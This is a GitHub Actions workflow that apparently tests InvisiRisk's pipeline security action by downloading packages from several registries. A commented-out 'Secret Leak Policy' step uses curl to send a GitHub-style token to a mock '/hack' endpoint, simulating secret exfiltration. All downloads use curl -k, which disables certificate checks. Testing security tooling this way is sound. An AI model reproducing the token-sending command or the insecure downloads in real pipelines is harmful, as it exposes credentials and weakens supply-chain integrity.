name: dependency tree python

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest


    steps:
      # ============= InvisiRisk Setup =============
      - name: Setup PSE
        uses:  invisirisk/pse-action@develop
        with:
          api_url: "https://app.dev.invisirisk.com"
          app_token: ${{secrets.IR_API_KEY}}
      # ============= InvisiRisk Setup End =============
      # # Checkout repository
      # - name: Checkout code
      #   uses: actions/checkout@v4

      # - name: Use Python
      #   uses: actions/setup-python@v4
      #   with:
      #     python-version: "3.11"
      #     cache: "pip"
      #     cache-dependency-path: "requirements.txt"

      # - name: Install dependencies
      #   run: pip install -r requirements.txt


      # - name: Secret Leak Policy
      #   run: |
      #     curl -k -X GET https://vbirmock.free.beeceptor.com/hack \
      #       -H "Content-Type: application/json" \
      #       -d '{
      #       "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
      #     }'
      #     echo "Exit code: $?"


      # - name: Install Critical Vulnerable package (in dataset)
      #   continue-on-error: true
      #   run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/pandasai-0.8.1-py2.py3-none-any.whl


      - run: curl -k -O https://rubygems.org/downloads/foreman-tasks-12.2.1.gem
      - run: curl -k -O https://repo1.maven.org/maven2/org/jetbrains/kotlin/kotlin-stdlib/2.3.21/kotlin-stdlib-2.3.21.jar
      - run: curl -k -O https://api.nuget.org/v3-flatcontainer/KeepDynamic.Ocr.Fraktur/6.0.0.10/KeepDynamic.Ocr.Fraktur.6.0.0.10.nupkg
      

      # ============= InvisiRisk Cleanup =============
      - name: Cleanup PSE
        if: always()
        uses:  invisirisk/pse-action@develop
        with:
          cleanup: "true"
      # ============= InvisiRisk Cleanup End =============
